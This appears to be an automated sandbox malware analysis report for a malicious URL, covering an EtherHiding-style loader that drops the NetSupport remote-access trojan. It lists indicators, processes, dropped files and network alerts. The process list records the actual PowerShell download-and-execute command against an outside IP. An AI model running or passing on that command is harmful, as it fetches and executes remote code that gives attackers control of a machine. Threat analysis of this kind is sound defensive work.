Malware analysis www.local.laurenduterrail.com Malicious activity

Add for printing

URL:	www.local.laurenduterrail.com
Full analysis:	https://app.any.run/tasks/cb0f0f0d-88f5-4da1-bd6f-acebb9be586b
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software. Malware Trends Tracker >>>
Analysis date:	February 25, 2026, 19:51:44
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	evasion etherhiding loader netsupport remote rmm-tool
Indicators:
MD5:	B360CB4F4067E41C30219B4FD7281AFB
SHA1:	C638333617433CD8DEC04D2808860D6836BEBF72
SHA256:	5ECAEAD599C333A82E33A6787CBFCE178376B902F71DA2A678FE875542AEC02C
SSDEEP:	3:EgFLQaETyTn:hFLpTn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: off
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- ETHERHIDING has been detected (SURICATA)
  - firefox.exe (PID: 6156)
- Loader pattern has been found
  - powershell.exe (PID: 4552)
- NETSUPPORT has been found (auto)
  - powershell.exe (PID: 4552)
- Proxy execution via Explorer
  - powershell.exe (PID: 4552)
- Create files in the Startup directory
  - powershell.exe (PID: 4552)
- NETSUPPORT mutex has been found
  - haliy.exe (PID: 5520)
- NETSUPPORT has been detected (SURICATA)
  - haliy.exe (PID: 5520)
SUSPICIOUS
- Checks for external IP
  - svchost.exe (PID: 2292)
- Found IP address in command line
  - powershell.exe (PID: 4552)
- Possibly malicious use of IEX has been detected
  - powershell.exe (PID: 4552)
- Uses base64 encoding (POWERSHELL)
  - powershell.exe (PID: 4552)
- Gets path to any of the special folders (POWERSHELL)
  - powershell.exe (PID: 4552)
- Creates a directory (POWERSHELL)
  - powershell.exe (PID: 4552)
- The process drops C-runtime libraries
  - powershell.exe (PID: 4552)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 4552)
- Contacting a server suspected of hosting an CnC
  - haliy.exe (PID: 5520)
- Drop NetSupport executable file
  - powershell.exe (PID: 4552)
INFO
- Application launched itself
  - firefox.exe (PID: 4128)
  - firefox.exe (PID: 6156)
- Drops script file
  - powershell.exe (PID: 4552)
  - firefox.exe (PID: 6156)
- Manual execution by a user
  - powershell.exe (PID: 4552)
  - notepad.exe (PID: 2052)
- Disables trace logs
  - powershell.exe (PID: 4552)
- Checks proxy server information
  - powershell.exe (PID: 4552)
- The sample compiled with english language support
  - powershell.exe (PID: 4552)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 4552)
- Launching a file from the Startup directory
  - powershell.exe (PID: 4552)
- Creates files in the program directory
  - powershell.exe (PID: 4552)
- Reads the computer name
  - haliy.exe (PID: 5520)
- Reads security settings of Internet Explorer
  - explorer.exe (PID: 8912)
- Checks supported languages
  - haliy.exe (PID: 5520)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

168

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

2052

"C:\WINDOWS\system32\notepad.exe"

C:\Windows\System32\notepad.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Notepad

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll

2292

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

3056

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250227124745 -sandboxingKind 0 -prefsHandle 4644 -prefsLen 45267 -prefMapHandle 4472 -prefMapSize 272981 -ipcHandle 4468 -initialChannelId {7db1ac5d-1396-47a2-8d2f-74857aecd755} -parentPid 6156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility

C:\Program Files\Mozilla Firefox\firefox.exe

—

firefox.exe

User:

admin

Company:

Mozilla Corporation

Integrity Level:

MEDIUM

Description:

Firefox

Version:

136.0

Modules

Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
c:\windows\system32\bcrypt.dll

3304

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4716 -prefsLen 39330 -prefMapHandle 4712 -prefMapSize 272981 -jsInitHandle 4720 -jsInitLen 247456 -parentBuildID 20250227124745 -ipcHandle 4736 -initialChannelId {ae9ff740-c654-4dc6-bd10-5324ebae54b4} -parentPid 6156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab

C:\Program Files\Mozilla Firefox\firefox.exe

—

firefox.exe

User:

admin

Company:

Mozilla Corporation

Integrity Level:

MEDIUM

Description:

Firefox

Version:

136.0

Modules

Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll

4104

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4128

"C:\Program Files\Mozilla Firefox\firefox.exe" www.local.laurenduterrail.com

C:\Program Files\Mozilla Firefox\firefox.exe

—

explorer.exe

User:

admin

Company:

Mozilla Corporation

Integrity Level:

MEDIUM

Description:

Firefox

Exit code:

Version:

136.0

Modules

Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140_1.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\windows\system32\bcrypt.dll

4200

"C:\WINDOWS\explorer.exe" C:\ProgramData\w7yXAty516\uvPg1r6A.url

C:\Windows\explorer.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Explorer

Exit code:

Version:

10.0.19041.3758 (WinBuild.160101.0800)

Modules

Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shcore.dll

4508

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4788 -prefsLen 39330 -prefMapHandle 4800 -prefMapSize 272981 -jsInitHandle 4668 -jsInitLen 247456 -parentBuildID 20250227124745 -ipcHandle 5492 -initialChannelId {0804612c-3473-4872-9bdb-0230e785c10f} -parentPid 6156 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6156" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab

C:\Program Files\Mozilla Firefox\firefox.exe

—

firefox.exe

User:

admin

Company:

Mozilla Corporation

Integrity Level:

MEDIUM

Description:

Firefox

Version:

136.0

Modules

Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\msvcp140.dll

4552

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -wi mi -EP B -c iex(irm 193.111.117.21/R.GRE)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5520

"C:\Users\admin\Desktop\uvPg1r6A\haliy.exe"

C:\Users\admin\Desktop\uvPg1r6A\haliy.exe

explorer.exe

User:

admin

Company:

NetSupport Ltd

Integrity Level:

MEDIUM

Description:

NetSupport Client Application

Version:

V14.10

Modules

Images
c:\users\admin\desktop\uvpg1r6a\haliy.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\users\admin\desktop\uvpg1r6a\pcicl32.dll

Add for printing

Total events

7 367

Read events

7 364

Write events

Delete events

Modification events


(PID) Process:	(8912) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:	write	Name:	{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
Value: 01000000000000007DF8EB4A90A6DC01
(PID) Process:	(4552) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	write	Name:	SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:	(4552) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	write	Name:	SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000469C0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000

Add for printing

Executable files

Suspicious files

204

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
6156	firefox.exe	C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin		—
		MD5:—	SHA256:—
6156	firefox.exe	C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\cookies.sqlite-shm		binary
		MD5:B7C14EC6110FA820CA6B65F5AEC85911	SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
6156	firefox.exe	C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-child-current.bin		binary
		MD5:5152D8F49F1AD4219D935611EFE18437	SHA256:9A6E50715E3C49A43E3D622EDE7E37ECF0767342B3039B8B0AE25BBE4FF6F66E
6156	firefox.exe	C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite		—
		MD5:—	SHA256:—
6156	firefox.exe	C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm		binary
		MD5:B7C14EC6110FA820CA6B65F5AEC85911	SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
6156	firefox.exe	C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\activity-stream.discovery_stream.json.tmp		text
		MD5:BB9079AC07D1CA7415632B3D2A66DD94	SHA256:787C84D951C385583AB39BBC532A86970B5D060047D0A459FBBEDBAFCB35EC48
6156	firefox.exe	C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm		binary
		MD5:B7C14EC6110FA820CA6B65F5AEC85911	SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
6156	firefox.exe	C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\activity-stream.contile.json.tmp		text
		MD5:E83645A661184DA9B90A0A65D0DFF8BA	SHA256:09C6BD57A3319AAF3A5B6BA1DE2E25AAFB9372654938E96A4A41297DF7E32497
6156	firefox.exe	C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm		binary
		MD5:B7C14EC6110FA820CA6B65F5AEC85911	SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
6156	firefox.exe	C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\prefs-1.js		text
		MD5:DCD49AC2E49885A43EFA57E25AF4FE75	SHA256:33FC289A9BA13262437C505B7BC95EEFC4784399D2E7D9DF3ACA42B0A612B8DD

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

211

TCP/UDP connections

DNS requests

111

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6156	firefox.exe	GET	200	151.101.193.91:443	https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?collection=url-parser-default-unknown-schemes-interventions&bucket=main&_expected=0	US	text	274 b	unknown
—	—	GET	200	204.79.197.203:80	http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D	US	binary	959 b	whitelisted
—	—	GET	200	23.63.118.230:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D	US	binary	313 b	whitelisted
6156	firefox.exe	GET	200	151.101.193.91:443	https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?collection=hijack-blocklists&bucket=main&_expected=0	US	text	243 b	unknown
6156	firefox.exe	GET	101	34.107.243.93:443	https://push.services.mozilla.com/	US	—	—	unknown
6156	firefox.exe	GET	200	151.101.193.91:443	https://firefox.settings.services.mozilla.com/v1/	US	text	1.20 Kb	unknown
6156	firefox.exe	GET	200	151.101.193.91:443	https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/url-parser-default-unknown-schemes-interventions/changeset?_expected=1743513175300&_since=%221726769128879%22	US	text	1.76 Kb	unknown
6156	firefox.exe	GET	301	109.234.165.184:80	http://www.local.laurenduterrail.com/	FR	binary	1 b	unknown
6156	firefox.exe	GET	200	34.107.221.82:80	http://detectportal.firefox.com/canonical.html	US	text	90 b	unknown
6156	firefox.exe	GET	200	34.107.221.82:80	http://detectportal.firefox.com/success.txt?ipv4	US	text	8 b	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
7304	svchost.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
4	System	192.168.100.255:137	—	Not routed	—	whitelisted
148	RUXIMICS.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
6768	MoUsoCoreWorker.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
5568	SearchApp.exe	2.16.204.141:443	www.bing.com	AKAMAI-ASN1	NL	whitelisted
—	—	23.63.118.230:80	ocsp.digicert.com	AKAMAI-AS	US	whitelisted
—	—	204.79.197.203:80	oneocsp.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
3412	svchost.exe	172.211.123.248:443	client.wns.windows.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
4	System	192.168.100.255:138	—	Not routed	—	whitelisted
6156	firefox.exe	151.101.193.91:443	firefox.settings.services.mozilla.com	FASTLY	US	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	40.127.240.158 51.104.136.2 20.73.194.208	whitelisted
google.com	142.251.208.14	whitelisted
self.events.data.microsoft.com	104.208.16.95	whitelisted
www.bing.com	2.16.204.141 2.16.204.138 2.16.204.158 2.16.204.155 2.16.204.134 2.16.204.151 2.16.204.139 2.16.204.152 2.16.204.160	whitelisted
ocsp.digicert.com	23.63.118.230	whitelisted
oneocsp.microsoft.com	204.79.197.203	whitelisted
client.wns.windows.com	172.211.123.248	whitelisted
firefox.settings.services.mozilla.com	151.101.193.91 151.101.1.91 151.101.129.91 151.101.65.91	whitelisted
mozilla.map.fastly.net	151.101.193.91 151.101.1.91 151.101.129.91 151.101.65.91 2a04:4e42:400::347 2a04:4e42:200::347 2a04:4e42::347 2a04:4e42:600::347	whitelisted
www.local.laurenduterrail.com	109.234.165.184	unknown

Threats

PID	Process	Class	Message
2292	svchost.exe	A Network Trojan was detected	MALWARE [ANY.RUN] Suspected Domain Associated with Malware Distribution (security-malware .com)
2292	svchost.exe	Misc activity	ET INFO Observed DNS Query to Blockchain RPC Domain (rpc-mainnet .matic .quiknode .pro)
2292	svchost.exe	Misc activity	ET INFO Observed DNS Query to Blockchain RPC Domain (rpc-mainnet .matic .quiknode .pro)
2292	svchost.exe	Misc activity	ET INFO Observed DNS Query to Blockchain RPC Domain (rpc-mainnet .matic .quiknode .pro)
2292	svchost.exe	Misc activity	ET INFO Observed DNS Query to Blockchain RPC Domain (rpc-mainnet .matic .quiknode .pro)
6156	firefox.exe	Misc activity	ET INFO Observed Blockchain RPC Domain (rpc-mainnet .matic .quiknode .pro in TLS SNI)
6156	firefox.exe	Misc activity	ET INFO Observed Blockchain RPC Domain (rpc-mainnet .matic .quiknode .pro in TLS SNI)
2292	svchost.exe	Potentially Bad Traffic	ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is)
2292	svchost.exe	Potentially Bad Traffic	ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is)
6156	firefox.exe	Misc activity	INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)

Add for printing

No debug info

General Info

www.local.laurenduterrail.com

B360CB4F4067E41C30219B4FD7281AFB

C638333617433CD8DEC04D2808860D6836BEBF72

5ECAEAD599C333A82E33A6787CBFCE178376B902F71DA2A678FE875542AEC02C

3:EgFLQaETyTn:hFLpTn

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

ETHERHIDING has been detected (SURICATA)

Loader pattern has been found

NETSUPPORT has been found (auto)

Proxy execution via Explorer

Create files in the Startup directory

NETSUPPORT mutex has been found

NETSUPPORT has been detected (SURICATA)

SUSPICIOUS

Checks for external IP

Found IP address in command line

Possibly malicious use of IEX has been detected

Uses base64 encoding (POWERSHELL)

Gets path to any of the special folders (POWERSHELL)

Creates a directory (POWERSHELL)

The process drops C-runtime libraries

Executable content was dropped or overwritten

Contacting a server suspected of hosting an CnC

Drop NetSupport executable file

INFO

Application launched itself

Drops script file

Manual execution by a user

Disables trace logs

Checks proxy server information

The sample compiled with english language support

Gets data length (POWERSHELL)

Launching a file from the Startup directory

Creates files in the program directory

Reads the computer name

Reads security settings of Internet Explorer

Checks supported languages

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings